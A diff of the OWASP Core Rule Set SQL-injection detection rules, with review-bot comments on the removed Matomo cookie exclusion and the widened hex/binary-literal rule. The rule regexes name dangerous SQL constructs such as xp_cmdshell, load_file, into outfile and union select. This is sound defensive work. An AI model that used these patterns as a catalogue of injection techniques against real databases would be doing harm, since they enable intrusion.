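Review bot: Dropping `!REQUEST_COOKIES:/_pk_ref/` from the 942380 target list (and likewise for 942390 and 942400 on the next line, and for 942470, 942480, 942440, 942420 and 942421 further down) means Matomo/Piwik `_pk_ref` referrer cookies are now inspected by these SQLi rules, which widens the false-positive surface for any deployment that relied on the built-in exclusion. If the exclusion has been moved to a rule-exclusion package or plugin, a short comment on the first affected rule saying so would spare future readers the same question, e.g. `# Matomo _pk_ref cookie exclusion no longer applied here; handled by <exclusion package/plugin> instead`. If it has not been moved, the release notes should call this out as a behaviour change for Matomo users. The rule body of 942380 continues past this hunk.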
@@ -1140,7 +1140,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942390 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:or\b(?:[\s\x0b]?(?:[0-9]{1,10}|[\"'][^=]{1,10}[\"'])[\s\x0b]?[<->]+|[\s\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\s\x0b]*?[<->])?)|xor\b[\s\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\s\x0b]*?[<->])?)|'[\s\x0b]+x?or[\s\x0b]+.{1,20}[!\+\-<->]" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:or\b(?:[\s\x0b]?(?:[0-9]{1,10}|[\"'][^=]{1,10}[\"'])[\s\x0b]?[<->]+|[\s\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\s\x0b]*?[<->])?)|xor\b[\s\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\s\x0b]*?[<->])?)|'[\s\x0b]+x?or[\s\x0b]+.{1,20}[!\+\-<->]" \ "id:942390,\ phase:2,\ block,\ @@ -1156,7 +1156,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1166,7 +1166,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942400 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\band\b(?:[\s\x0b]+(?:[0-9]{1,10}[\s\x0b]*?[<->]|'[^=]{1,10}')| ?(?:[0-9]{1,10}|[\"'][^=]{1,10}[\"']) ?[<->]+)" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\band\b(?:[\s\x0b]+(?:[0-9]{1,10}[\s\x0b]*?[<->]|'[^=]{1,10}')| ?(?:[0-9]{1,10}|[\"'][^=]{1,10}[\"']) ?[<->]+)" \ "id:942400,\ phase:2,\ block,\ 
@@ -1182,7 +1182,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -1197,7 +1197,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942410 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:(?:b|co)s|dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:in|cii(?:str)?)|tan2?|vg)|b(?:enchmark|i(?:n(?:_to_num)?|t_(?:and|count|length|x?or)))|c(?:ast|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|o(?:alesce|ercibility|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|(?:un)?t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|time(?:stamp)?|user)))|d(?:a(?:t(?:abase|e(?:_(?:add|format|sub)|diff)?)|y(?:name|of(?:month|week|year))?)|count|e(?:code|(?:faul|s_(?:de|en)cryp)t|grees)|ump)|e(?:lt|nc(?:ode|rypt)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:eld(?:_in_set)?|nd_in_set)|loor|o(?:rmat|und_rows)|rom_(?:base64|days|unixtime))|g(?:et_(?:format|lock)|r(?:eates|oup_conca)t)|h(?:ex(?:toraw)?|our)|i(?:f(?:null)?|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)?|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull))|null)?)|l(?:ast(?:_(?:day|insert_id))?|case|e(?:(?:as|f)t|ngth)|n|o(?:ad_file|ca(?:l(?:timestamp)?|te)|g(?:10|2)?|wer)|pad|trim)|m(?:a(?:ke(?:date|_set)|ster_pos_wait|x)|d5|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:d|nth(?:name)?))|n(?:ame_const|o(?:t_in|w)|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:assword|eriod_(?:add|diff)|g_sleep|i|o(?:sition|w(?:er)?)|rocedure_analyse)|qu(?:arter|ote)|r(?:a(?:dians|nd|wto(?:hex|nhex(?:toraw)?))|e(?:lease_lock|p(?:eat|lace)|verse)|ight|o(?:und|w_count)|pad|trim)|s(?:chema|e(?:c(?:ond|_to_time)|ssion_user)|ha[12]?|ig?n|leep|oundex|pace|qrt|t(?:d(?:dev(?:_(?:po|sam)p)?)?|r(?:cmp|_to_date))|u(?:b(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|m)|ys(?:date|tem_user))|t(?:an|ime(?:diff|_(?:format|to_sec)|stamp(?:add|diff)?)?|o_(?:base64|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compr
ess(?:ed_length)?|hex|ix_timestamp)|p(?:datexml|per)|ser|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|v(?:a(?:lues|r(?:iance|_(?:po|sam)p))|ersion)|we(?:ek(?:day|ofyear)?|ight_string)|xmltype|year(?:week)?)[^0-9A-Z_a-z]*?\(" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:(?:b|co)s|vg)|bin|c(?:(?:as|o(?:nver|un))t|h(?:ar(?:set)?|r))|d(?:a(?:te|y)|e(?:fault|grees))|elt|f(?:ield|loor|ormat)|(?:hou|quarte|yea)r|i[fns]|l(?:ast|e(?:ft|ngth)|n|ikelihood|o(?:cal|g|wer))|m(?:ax|in(?:ute)?|o(?:d|nth))|now|p(?:assword|i|o(?:sition|wer))|r(?:awtonhex(?:toraw)?|e(?:p(?:eat|lace)|verse)|ight|ound)|s(?:econd|ign|leep|pace|tddev|um)|t(?:an|ime|o_(?:n?char|(?:day|second)s))|u(?:nlikely|(?:pp|s)er)|v(?:alues|ersion)|week)[^0-9A-Z_a-z]*?\(" \ "id:942410,\ phase:2,\ block,\ @@ -1213,7 +1213,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
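Review bot: Rule 942410 is the only rule touched by this commit whose new target list still carries `!REQUEST_COOKIES:/_pk_ref/`, while 942380, 942390, 942400, 942470, 942480, 942440, 942420 and 942421 all lose it. If keeping the Matomo referrer-cookie exclusion here is deliberate (function-like tokens can plausibly appear in referrer URLs), a one-line comment above the rule would make the asymmetry read as intentional rather than as an oversight, e.g. `# _pk_ref deliberately kept excluded for this rule; see sibling rules which no longer exclude it`. If it is an oversight, the target list should become `REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*` to match its siblings. The regex on this line is generated by `crs-toolchain regex update 942410` from the regex-assembly sources, so the assembly file is where the much shorter function list should be confirmed as intended. The rule body continues outside this hunk.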
@@ -1226,7 +1226,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942470 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)autonomous_transaction|(?:current_use|n?varcha|tbcreato)r|db(?:a_users|ms_java)|open(?:owa_util|query|rowset)|s(?:p_(?:(?:addextendedpro|sqlexe)c|execute(?:sql)?|help|is_srvrolemember|makewebtask|oacreate|p(?:assword|repare)|replwritetovarbin)|ql_(?:longvarchar|variant))|utl_(?:file|http)|xp_(?:availablemedia|(?:cmdshel|servicecontro)l|dirtree|e(?:numdsn|xecresultset)|filelist|loginconfig|makecab|ntsec(?:_enumdomains)?|reg(?:addmultistring|delete(?:key|value)|enum(?:key|value)s|re(?:ad|movemultistring)|write)|terminate(?:_process)?)" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)autonomous_transaction|(?:current_use|n?varcha|tbcreato)r|db(?:a_users|ms_java)|open(?:owa_util|query|rowset)|s(?:p_(?:(?:addextendedpro|sqlexe)c|execute(?:sql)?|help|is_srvrolemember|makewebtask|oacreate|p(?:assword|repare)|replwritetovarbin)|ql_(?:longvarchar|variant))|utl_(?:file|http)|xp_(?:availablemedia|(?:cmdshel|servicecontro)l|dirtree|e(?:numdsn|xecresultset)|filelist|loginconfig|makecab|ntsec(?:_enumdomains)?|reg(?:addmultistring|delete(?:key|value)|enum(?:key|value)s|re(?:ad|movemultistring)|write)|terminate(?:_process)?)" \ "id:942470,\ phase:2,\ block,\ @@ -1242,7 +1242,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -1255,7 +1255,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942480 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:(?:d(?:bms_[0-9A-Z_a-z]+\.|elete\b[^0-9A-Z_a-z]*?\bfrom)|(?:group\b.*?\bby\b.{1,100}?\bhav|overlay\b[^0-9A-Z_a-z]*?\(.*?\b[^0-9A-Z_a-z]*?plac)ing|in(?:ner\b[^0-9A-Z_a-z]*?\bjoin|sert\b[^0-9A-Z_a-z]*?\binto|to\b[^0-9A-Z_a-z]*?\b(?:dump|out)file)|load\b[^0-9A-Z_a-z]*?\bdata\b.*?\binfile|s(?:elect\b.{1,100}?\b(?:(?:.*?\bdump\b.*|(?:count|length)\b.{1,100}?)\bfrom|(?:data_typ|from\b.{1,100}?\bwher)e|instr|to(?:_(?:cha|numbe)r|p\b.{1,100}?\bfrom))|ys_context)|u(?:nion\b.{1,100}?\bselect|tl_inaddr))\b|print\b[^0-9A-Z_a-z]*?@@)|(?:collation[^0-9A-Z_a-z]*?\(a|@@version|;[^0-9A-Z_a-z]*?\b(?:drop|shutdown))\b|'(?:dbo|msdasql|s(?:a|qloledb))'" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:(?:d(?:bms_[0-9A-Z_a-z]+\.|elete\b[^0-9A-Z_a-z]*?\bfrom)|(?:group\b.*?\bby\b.{1,100}?\bhav|overlay\b[^0-9A-Z_a-z]*?\(.*?\b[^0-9A-Z_a-z]*?plac)ing|in(?:ner\b[^0-9A-Z_a-z]*?\bjoin|sert\b[^0-9A-Z_a-z]*?\binto|to\b[^0-9A-Z_a-z]*?\b(?:dump|out)file)|load\b[^0-9A-Z_a-z]*?\bdata\b.*?\binfile|s(?:elect\b.{1,100}?\b(?:(?:.*?\bdump\b.*|(?:count|length)\b.{1,100}?)\bfrom|(?:data_typ|from\b.{1,100}?\bwher)e|instr|to(?:_(?:cha|numbe)r|p\b.{1,100}?\bfrom))|ys_context)|u(?:nion\b.{1,100}?\bselect|tl_inaddr))\b|print\b[^0-9A-Z_a-z]*?@@)|(?:collation[^0-9A-Z_a-z]*?\(a|@@version|;[^0-9A-Z_a-z]*?\b(?:drop|shutdown))\b|'(?:dbo|msdasql|s(?:a|qloledb))'" \ "id:942480,\ phase:2,\ block,\ 
@@ -1271,7 +1271,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|REQUEST tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1312,7 +1312,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1355,7 +1355,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ # crs-toolchain regex update 942440 # crs-toolchain regex update 942440-chain1 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx /\*!?|\*/|[';]--|--(?:[\s\x0b]|[^\-]*?-)|[^&\-]#.*?[\s\x0b]|;?\x00" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx /\*!?|\*/|[';]--|--(?:[\s\x0b]|[^\-]*?-)|[^&\-]#.*?[\s\x0b]|;?\x00" \ "id:942440,\ phase:2,\ block,\ @@ -1371,7 +1371,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "!@rx ^(?:ey[\-0-9A-Z_a-z]+\.ey[\-0-9A-Z_a-z]+\.)?[\-0-9A-Z_a-z]+$" \ 
@@ -1381,18 +1381,18 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # -# -=[ SQL Hex Evasion Methods ]=- +# -=[ SQL Bin / Hex Evasion Methods ]=- # # Hex encoding detection: # (?i:\b0x[a-f\d]{3,}) will match any 3 or more hex bytes after "0x", together forming a hexadecimal payload(e.g 0xf00, 0xf00d and so on) # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\b0x[a-f\d]{3,})" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\b0x[a-f\d]{3,}|x\'[a-f\d]{3,}\'|b\'[0-1]{10,}\')" \ "id:942450,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,\ - msg:'SQL Hex Encoding Identified',\ + msg:'SQL Bin or Hex Encoding Identified',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ @@ -1402,7 +1402,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1449,7 +1449,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:`(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
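Review bot: The two new alternatives in the 942450 regex, `x\'[a-f\d]{3,}\'` and `b\'[0-1]{10,}\'`, are not anchored on a word boundary the way the `\b0x` alternative is, so a quoted hex or binary run preceded by any word ending in `x` or `b` also matches, which costs false positives rather than detection; if standalone literals are the intent, `"@rx (?i:\b0x[a-f\d]{3,}|\bx\'[a-f\d]{3,}\'|\bb\'[0-1]{10,}\')"` would be consistent with the first alternative. The explanatory comment above the rule still describes only the `0x` form; it should also state that `x'…'` (hex string literal, 3 or more hex digits) and `b'…'` (binary literal, 10 or more bits) are now matched, in line with the renamed section header and `msg`. The rule body continues outside this hunk.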
@@ -1476,7 +1476,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1509,7 +1509,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.942521_matched_var_name=%{matched_var_name}',\ chain" @@ -1537,7 +1537,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ^.*?\x5c['\"`](?:.*?['\"`])?\s*(?:and|or)\b" tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1575,7 +1575,7 @@ SecRule REQUEST_BASENAME|REQUEST_FILENAME "@detectSQLi" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1607,7 +1607,7 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)\b(?:a(?:dd( tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -1637,15 +1637,15 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)create[\s\x0 tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # @@ -1677,7 +1677,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\W tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1701,7 +1701,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\"'`] tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" 
@@ -1725,7 +1725,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\"'`] # SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:foo_id" # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){8})" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){8})" \ "id:942420,\ phase:1,\ block,\ @@ -1741,7 +1741,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx (( tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1770,7 +1770,7 @@ SecRule ARGS_NAMES|!ARGS_NAMES:/^[\w]+\[[\w\-]+\]\[[\w\-]*?\]$/|!ARGS_NAMES:/^[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1812,7 +1812,7 @@ SecRule ARGS "@rx \W{4}" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}'" 
@@ -1860,7 +1860,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:'(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1889,14 +1889,14 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ';" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # 
